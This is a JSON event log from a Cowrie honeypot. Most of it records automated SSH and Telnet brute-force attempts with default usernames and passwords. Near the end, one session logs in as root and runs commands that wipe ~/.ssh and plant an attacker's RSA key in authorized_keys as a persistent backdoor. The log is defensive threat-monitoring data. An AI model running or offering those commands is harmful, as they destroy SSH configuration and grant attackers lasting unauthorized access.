nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:44:27.129779Z","src_ip":"212.227.125.160","session":"eb62fc3e77b6"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-28T05:44:27.446722Z","src_ip":"212.227.125.160","session":"eb62fc3e77b6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:44:28.554012Z","src_ip":"212.227.125.160","session":"eb62fc3e77b6"}
{"eventid":"cowrie.session.closed","duration":31.413593530654907,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:44:30.806611Z","src_ip":"212.227.235.229","session":"fbc48e93ae18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58726,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d6ff8002e28","protocol":"ssh","message":"New connection: 212.227.235.229:58726 (1.2.3.4:22) [session: 2d6ff8002e28]","sensor":"my-vps","timestamp":"2025-08-28T05:44:34.150550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:44:34.151463Z","src_ip":"212.227.235.229","session":"2d6ff8002e28"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:44:34.295653Z","src_ip":"212.227.235.229","session":"2d6ff8002e28"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-28T05:44:34.729458Z","src_ip":"212.227.235.229","session":"2d6ff8002e28"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:44:35.876864Z","src_ip":"212.227.235.229","session":"2d6ff8002e28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48270,"dst_ip":"1.2.3.4","dst_port":22,"session":"98ddfb48f87f","protocol":"ssh","message":"New connection: 212.227.125.160:48270 (1.2.3.4:22) [session: 98ddfb48f87f]","sensor":"my-vps","timestamp":"2025-08-28T05:44:41.742826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:44:41.743569Z","src_ip":"212.227.125.160","session":"98ddfb48f87f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:44:41.848643Z","src_ip":"212.227.125.160","session":"98ddfb48f87f"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:44:42.187251Z","src_ip":"212.227.125.160","session":"98ddfb48f87f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:44:43.294627Z","src_ip":"212.227.125.160","session":"98ddfb48f87f"}
{"eventid":"cowrie.session.connect","src_ip":"81.109.222.3","src_port":48695,"dst_ip":"1.2.3.4","dst_port":23,"session":"31b7144b3748","protocol":"telnet","message":"New connection: 81.109.222.3:48695 (1.2.3.4:23) [session: 31b7144b3748]","sensor":"my-vps","timestamp":"2025-08-28T05:44:51.562420Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42576,"dst_ip":"1.2.3.4","dst_port":22,"session":"adb62e10406e","protocol":"ssh","message":"New connection: 212.227.125.160:42576 (1.2.3.4:22) [session: adb62e10406e]","sensor":"my-vps","timestamp":"2025-08-28T05:44:54.349181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:44:54.359060Z","src_ip":"212.227.125.160","session":"adb62e10406e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:44:54.487065Z","src_ip":"212.227.125.160","session":"adb62e10406e"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:44:54.978613Z","src_ip":"212.227.125.160","session":"adb62e10406e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:44:56.085042Z","src_ip":"212.227.125.160","session":"adb62e10406e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36208,"dst_ip":"1.2.3.4","dst_port":22,"session":"acb87cd82e8a","protocol":"ssh","message":"New connection: 212.227.235.229:36208 (1.2.3.4:22) [session: acb87cd82e8a]","sensor":"my-vps","timestamp":"2025-08-28T05:45:00.648281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:45:00.648999Z","src_ip":"212.227.235.229","session":"acb87cd82e8a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:45:00.793210Z","src_ip":"212.227.235.229","session":"acb87cd82e8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45460,"dst_ip":"1.2.3.4","dst_port":22,"session":"1266ab3e55d9","protocol":"ssh","message":"New connection: 212.227.235.229:45460 (1.2.3.4:22) [session: 1266ab3e55d9]","sensor":"my-vps","timestamp":"2025-08-28T05:45:01.166391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:45:01.167399Z","src_ip":"212.227.235.229","session":"1266ab3e55d9"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:45:01.228952Z","src_ip":"212.227.235.229","session":"acb87cd82e8a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:45:01.309799Z","src_ip":"212.227.235.229","session":"1266ab3e55d9"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:45:01.740590Z","src_ip":"212.227.235.229","session":"1266ab3e55d9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:02.375101Z","src_ip":"212.227.235.229","session":"acb87cd82e8a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:02.884665Z","src_ip":"212.227.235.229","session":"1266ab3e55d9"}
{"eventid":"cowrie.session.closed","duration":13.494955062866211,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:05.057309Z","src_ip":"81.109.222.3","session":"31b7144b3748"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":51306,"dst_ip":"1.2.3.4","dst_port":23,"session":"125407bd3603","protocol":"telnet","message":"New connection: 8.222.212.69:51306 (1.2.3.4:23) [session: 125407bd3603]","sensor":"my-vps","timestamp":"2025-08-28T05:45:15.332101Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57944,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dbf94c2c7ea","protocol":"ssh","message":"New connection: 212.227.125.160:57944 (1.2.3.4:22) [session: 8dbf94c2c7ea]","sensor":"my-vps","timestamp":"2025-08-28T05:45:26.575909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:45:26.576588Z","src_ip":"212.227.125.160","session":"8dbf94c2c7ea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:45:26.681508Z","src_ip":"212.227.125.160","session":"8dbf94c2c7ea"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:45:26.998067Z","src_ip":"212.227.125.160","session":"8dbf94c2c7ea"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:28.105453Z","src_ip":"212.227.125.160","session":"8dbf94c2c7ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53128,"dst_ip":"1.2.3.4","dst_port":22,"session":"f165e152b6e7","protocol":"ssh","message":"New connection: 212.227.235.229:53128 (1.2.3.4:22) [session: f165e152b6e7]","sensor":"my-vps","timestamp":"2025-08-28T05:45:31.793623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:45:31.795702Z","src_ip":"212.227.235.229","session":"f165e152b6e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:45:31.938254Z","src_ip":"212.227.235.229","session":"f165e152b6e7"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:45:32.530404Z","src_ip":"212.227.235.229","session":"f165e152b6e7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:33.714767Z","src_ip":"212.227.235.229","session":"f165e152b6e7"}
{"eventid":"cowrie.session.connect","src_ip":"155.4.244.179","src_port":23119,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a6f4ec34884","protocol":"ssh","message":"New connection: 155.4.244.179:23119 (1.2.3.4:22) [session: 6a6f4ec34884]","sensor":"my-vps","timestamp":"2025-08-28T05:45:37.055182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:45:37.055888Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:45:37.089414Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.login.success","username":"root","password":"$RFV%TGB^YHN","message":"login attempt [root/$RFV%TGB^YHN] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:45:37.264937Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:45:37.351772Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:45:37.352476Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:45:37.353473Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:45:37.855256Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:45:38.011127Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T05:45:38.011951Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T05:45:38.047487Z","src_ip":"155.4.244.179","session":"6a6f4ec34884"}
